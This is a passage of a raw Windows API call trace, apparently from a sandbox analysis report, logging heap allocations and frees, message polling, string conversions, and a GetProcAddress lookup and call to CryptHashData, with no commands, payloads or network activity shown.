hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0087.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0087.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3) returned 0x2a719c8 [0087.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0087.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0087.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0087.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ab8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0087.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0087.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0087.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71a0 [0087.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0087.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.051] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0087.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69b80 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69b80 | out: hHeap=0x2af0000) returned 1 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0087.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0087.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a698b0 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.052] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.052] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.052] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.053] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0087.053] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69730 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.054] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0087.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9ee0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0087.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.055] GetProcAddress (hModule=0x76390000, lpProcName="CryptHashData") returned 0x763aeef0 [0087.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0087.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0087.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0087.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.055] CryptHashData (hHash=0x9a3b40, pbData=0x2a71a58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0087.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0087.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0087.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0087.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.056] RtlAllocateHeap 